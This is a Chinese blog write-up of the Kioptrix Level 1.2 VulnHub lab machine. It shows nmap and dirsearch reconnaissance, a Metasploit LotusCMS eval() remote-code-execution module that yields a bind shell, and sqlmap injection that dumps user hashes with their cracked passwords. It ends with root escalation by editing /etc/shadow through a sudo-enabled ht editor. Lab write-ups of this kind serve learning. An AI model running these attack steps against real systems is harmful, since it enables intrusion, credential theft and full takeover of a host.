当前位置: 首页 > article >正文

[vulnhub]Kioptrix: Level 1.2 (#3)

https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

主机发现端口扫描

  1. 使用nmap扫描网段类存活主机

    因为靶机是我最后添加的,所以靶机IP是169

    nmap -sP 192.168.75.0/24                
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:16 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00031s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00029s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.169
    Host is up (0.00052s latency).
    MAC Address: 00:0C:29:D1:B8:48 (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00021s latency).
    MAC Address: 00:50:56:EC:C5:A4 (VMware)
    Nmap scan report for 192.168.75.151
    
  2. 扫描主机开放端口

    nmap -sT -min-rate 10000 -p- 192.168.75.169
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:16 CST
    Nmap scan report for 192.168.75.169
    Host is up (0.0010s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    MAC Address: 00:0C:29:D1:B8:48 (VMware)
    
  3. 扫描主机服务版本以及系统版本

    nmap -sV -sT -O -p22,80 192.168.75.169     
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:19 CST
    Nmap scan report for 192.168.75.169
    Host is up (0.00044s latency).
    
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
    80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
    MAC Address: 00:0C:29:D1:B8:48 (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6
    OS details: Linux 2.6.9 - 2.6.33
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
  4. 扫描漏洞

    nmap -script=vuln -p22,80 192.168.75.169
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:20 CST
    Stats: 0:02:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
    NSE Timing: About 98.52% done; ETC: 13:22 (0:00:02 remaining)
    Stats: 0:02:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
    NSE Timing: About 98.52% done; ETC: 13:23 (0:00:02 remaining)
    Nmap scan report for 192.168.75.169
    Host is up (0.00027s latency).
    
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    | http-cookie-flags: 
    |   /: 
    |     PHPSESSID: 
    |_      httponly flag not set
    | http-sql-injection: 
    |   Possible sqli for queries:
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
    |_    http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    |_      http://ha.ckers.org/slowloris/
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    |_http-trace: TRACE is enabled
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.169
    |   Found the following possible CSRF vulnerabilities: 
    |     
    |     Path: http://192.168.75.169:80/gallery/
    |     Form id: 
    |     Form action: login.php
    |     
    |     Path: http://192.168.75.169:80/index.php?system=Admin
    |     Form id: contactform
    |     Form action: index.php?system=Admin&page=loginSubmit
    |     
    |     Path: http://192.168.75.169:80/gallery/gadmin/
    |     Form id: username
    |     Form action: index.php?task=signin
    |     
    |     Path: http://192.168.75.169:80/gallery/index.php
    |     Form id: 
    |     Form action: login.php
    |     
    |     Path: http://192.168.75.169:80/index.php?system=Blog&post=1281005380
    |     Form id: commentform
    |     Form action: 
    |     
    |     Path: http://192.168.75.169:80/index.php?system=Admin&page=loginSubmit
    |     Form id: contactform
    |_    Form action: index.php?system=Admin&page=loginSubmit
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-enum: 
    |   /phpmyadmin/: phpMyAdmin
    |   /cache/: Potentially interesting folder
    |   /core/: Potentially interesting folder
    |   /icons/: Potentially interesting folder w/ directory listing
    |   /modules/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
    |_  /style/: Potentially interesting folder
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    MAC Address: 00:0C:29:D1:B8:48 (VMware)
    

WEB渗透

  1. 访问主页

    在这里插入图片描述

  2. 扫描目录

    dirsearch -u 192.168.75.169 -x 403
    //
    [13:31:06] Starting:                                                                                                                                                                                              
    [13:31:27] 301 -  355B  - /cache  ->  http://192.168.75.169/cache/          
    [13:31:31] 301 -  354B  - /core  ->  http://192.168.75.169/core/            
    [13:31:31] 200 -  688B  - /core/fragments/moduleInfo.phtml
    [13:31:36] 200 -   23KB - /favicon.ico                                      
    [13:31:37] 301 -  357B  - /gallery  ->  http://192.168.75.169/gallery/      
    [13:31:47] 301 -  357B  - /modules  ->  http://192.168.75.169/modules/      
    [13:31:47] 200 -    2KB - /modules/                                         
    [13:31:52] 301 -  360B  - /phpmyadmin  ->  http://192.168.75.169/phpmyadmin/
    [13:31:53] 401 -  520B  - /phpmyadmin/scripts/setup.php                     
    [13:31:53] 200 -    8KB - /phpmyadmin/                                      
    [13:31:53] 200 -    8KB - /phpmyadmin/index.php                             
    [13:32:03] 301 -  355B  - /style  ->  http://192.168.75.169/style/          
    [13:32:08] 200 -   18B  - /update.php    
    
    • /modules 像是文件服务器
    • /phpmyadmin phpmyadmin
    • /update.php 提示permission denied.
    • index.php?system=Admin 是登陆页面
  3. 登陆页面发现是CMS是LotusCMS 查阅有没有可以利用漏洞

    • 看见ruby后缀利用文件,上msf搜索看看

      # searchsploit LotusCMS    
      //
      -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
       Exploit Title                                                                                                                                                                  |  Path
      -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
      LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit)                                                                                                                   | php/remote/18565.rb
      LotusCMS 3.0.3 - Multiple Vulnerabilities                                                                                                                                       | php/webapps/16982.txt
      -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
      
    • 进入msf控制台,进行搜索,应该就是searchsploit 搜索出来的那个

      msf6 > search LotusCMS
      
      Matching Modules
      ================
      
         #  Name                              Disclosure Date  Rank       Check  Description
         -  ----                              ---------------  ----       -----  -----------
         0  exploit/multi/http/lcms_php_exec  2011-03-03       excellent  Yes    LotusCMS 3.0 eval() Remote Command Execution
      
    • 尝试利用

      msf6 > use exploit/multi/http/lcms_php_exec 
      msf6 exploit(multi/http/lcms_php_exec) > set rhosts 192.168.75.169
      rhosts => 192.168.75.169
      msf6 exploit(multi/http/lcms_php_exec) > set uri /index.php?system=Admin
      uri => /index.php?system=Admin
      msf6 exploit(multi/http/lcms_php_exec) > run
      [*] Started reverse TCP handler on 192.168.75.151:4444 
      [*] Using found page param: /index.php?page=index
      [*] Sending exploit ...
      [*] Exploit completed, but no session was created.
      

      死活不成功,尝试换一下payload

      msf6 exploit(multi/http/lcms_php_exec) > set payload php/reverse_php 
      payload => php/reverse_php
      

      尝试了几个payload后发现php/bind_perl 可以使用

      msf6 exploit(multi/http/lcms_php_exec) > set payload php/reverse_perl 
      payload => php/reverse_perl
      msf6 exploit(multi/http/lcms_php_exec) > run
      
      [*] Started reverse TCP handler on 192.168.75.151:4444 
      [*] Using found page param: /index.php?page=index
      [*] Sending exploit ...
      [*] Exploit completed, but no session was created.
      msf6 exploit(multi/http/lcms_php_exec) > set payload php/bind_perl
      payload => php/bind_perl
      msf6 exploit(multi/http/lcms_php_exec) > run
      
      [*] Using found page param: /index.php?page=index
      [*] Sending exploit ...
      [*] Started bind TCP handler against 192.168.75.169:4444
      [*] Command shell session 1 opened (192.168.75.151:34319 -> 192.168.75.169:4444) at 2024-10-29 14:08:36 +0800
      whoami
      www-data
      

提权

  1. 查看权限

    python -c "import pty;pty.spawn('/bin/sh')"
    //
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    //
    $ uname -a
    Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
    //
    $ whoami
    www-data
    
  2. 寻找突破口

    • suid提权寻找

      $ find / -perm -u=s -type f 2>/dev/null
      /usr/lib/eject/dmcrypt-get-device
      /usr/lib/openssh/ssh-keysign
      /usr/lib/apache2/suexec
      /usr/lib/pt_chown
      /usr/bin/arping
      /usr/bin/mtr
      /usr/bin/newgrp
      /usr/bin/chfn
      /usr/bin/gpasswd
      /usr/bin/sudo
      /usr/bin/at
      /usr/bin/sudoedit
      /usr/bin/chsh
      /usr/bin/passwd
      /usr/bin/traceroute6.iputils
      /usr/local/bin/ht
      /usr/sbin/pppd
      /usr/sbin/uuidd
      /lib/dhcp3-client/call-dhclient-script
      /bin/fusermount
      /bin/ping
      /bin/mount
      /bin/umount
      /bin/ping6
      /bin/su
      
    • /etc/phpmyadminconfig.inc.php存在数据库账号密码,尝试但是登陆失败

      // $cfg['Servers'][$i]['controluser'] = 'pma';
      // $cfg['Servers'][$i]['controlpass'] = 'pmapass';
      
    • 寻找敏感文件,在/home/loneferret 存在一个CompanyPolicy.README 文件

      # CompanyPolicy.README
      Hello new employee,
      It is company policy here to use our newly installed software for editing, creating and viewing files.
      Please use the command 'sudo ht'.
      Failure to do so will result in you immediate termination.
      
      DG
      CEO
      

      但是sudo ht需要密码,继续寻找别的方法

web渗透 2

  1. 才知道我的靶机有问题,访问gallery/ 会加载不完全,被浏览器自动拦截了很多内容。

    在这里插入图片描述

  2. 取消拦截后就好了

  3. 发现 http://kioptrix3.com/gallery/gallery.php?id=1 有个可能存在sql注入的地方,使用sqlmap检测是否存在sql注入

    # 结果
    [19:07:04] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    web application technology: PHP 5.2.4, Apache 2.2.8, PHP
    back-end DBMS: MySQL >= 5.0.12
    [19:07:05] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 23 times
    [19:07:05] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'
    

    存在sql注入,继续使用sqlmap来爆破剩余的数据

    最后dump下两行数据,是两个用户

    +----+---------------------------------------------+------------+
    | id | password                                    | username   |
    +----+---------------------------------------------+------------+
    | 1  | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   | dreg       |
    | 2  | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
    +----+---------------------------------------------+------------+
    
  4. 使用爆破出来的用户去尝试登陆 ssh,loneferret成功登入

提权 2

  1. 查看权限

    loneferret@Kioptrix3:~$ sudo -l
    User loneferret may run the following commands on this host:
        (root) NOPASSWD: !/usr/bin/su
    	    (root) NOPASSWD: /usr/local/bin/ht
    

    ht拥有sudo权限,根据之前发现的内容知道ht可以编辑文件,并且拥有sudo权限

  2. 尝试修改shadow文件

    loneferret@Kioptrix3:~$ sudo ht /etc/shadow
    Error opening terminal: xterm-256color.
    

    报错了:Error opening terminal: xterm-256color. ,需要加上

    export TERM=xterm
    
  3. 直接将当前用户的密码覆盖到root上去,F3好像是编辑,F2保存,ctrl + c退出

    在这里插入图片描述

  4. 然后ssh登录root账户,提权成功

    loneferret@Kioptrix3:~$ su root
    Password:                                                                                                                                                                                                         
    root@Kioptrix3:/home/loneferret# 
    

    读取flag文件

    root@Kioptrix3:~# cat Congrats.txt 
    //
    Good for you for getting here.                                                                                                                                                                                    
    Regardless of the matter (staying within the spirit of the game of course)                                                                                                                                        
    you got here, congratulations are in order. Wasn't that bad now was it.                                                                                                                                           
                                                                                                                                                                                                                      
    Went in a different direction with this VM. Exploit based challenges are
    nice. Helps workout that information gathering part, but sometimes we
    need to get our hands dirty in other things as well.
    Again, these VMs are beginner and not intented for everyone. 
    Difficulty is relative, keep that in mind.
    
    The object is to learn, do some research and have a little (legal)
    fun in the process.
    
    I hope you enjoyed this third challenge.
    
    Steven McElrea
    aka loneferret
    http://www.kioptrix.com
    
    Credit needs to be given to the creators of the gallery webapp and CMS used
    for the building of the Kioptrix VM3 site.
    
    Main page CMS: 
    http://www.lotuscms.org
    
    Gallery application: 
    Gallarific 2.1 - Free Version released October 10, 2009
    http://www.gallarific.com
    Vulnerable version of this application can be downloaded
    from the Exploit-DB website:
    http://www.exploit-db.com/exploits/15891/
    
    The HT Editor can be found here:
    http://hte.sourceforge.net/downloads.html
    And the vulnerable version on Exploit-DB here:
    http://www.exploit-db.com/exploits/17083/
    
    Also, all pictures were taken from Google Images, so being part of the
    public domain I used them.
    
    root@Kioptrix3:~# 
    
    

http://www.kler.cn/a/370719.html

相关文章:

  • 从AI生成内容到虚拟现实:娱乐体验的新边界
  • RV1126+FFMPEG推流项目(6)视频码率及其码率控制方式
  • 简历_使用优化的Redis自增ID策略生成分布式环境下全局唯一ID,用于用户上传数据的命名以及多种ID的生成
  • 关于高级工程师的想法
  • 持续集成 01|Gitee介绍、Pycharm使用Gitee
  • 2025第3周 | json-server的基本使用
  • 2024年9月电子学会青少年软件编程Python等级考试(三级)真题试卷
  • 赛博威携手百度智能云,开启数字营销新未来
  • Docker Compose一键部署Spring Boot + Vue项目
  • CSS3新增长度单位
  • 在Ubuntu(Linux)系统下安装Anaconda3
  • Kubernetes固定Pod IP和Mac地址
  • 手机号二要素核验 API 对接说明
  • 【04】RabbitMQ的集群机制
  • Ajax:表单 模板引擎
  • smuge error
  • 2025秋招八股文--服务器篇
  • 我接触csdn中的c++的时间
  • 简记Vue3(二)—— computed、watch、watchEffect
  • 【蓝桥杯选拔赛真题78】python电话号码 第十五届青少年组蓝桥杯python选拔赛真题 算法思维真题解析
  • 使用 FastGPT 工作流实现 AI 赛博算卦,一键生成卦象图
  • 【Python小游戏12——愤怒的小鸟】
  • 【MySQL】实战篇—项目需求分析:ER图的绘制与关系模型设计
  • Linux命令 用户操作简介
  • CCF A类论文复现第一天
  • App相关技术以及打包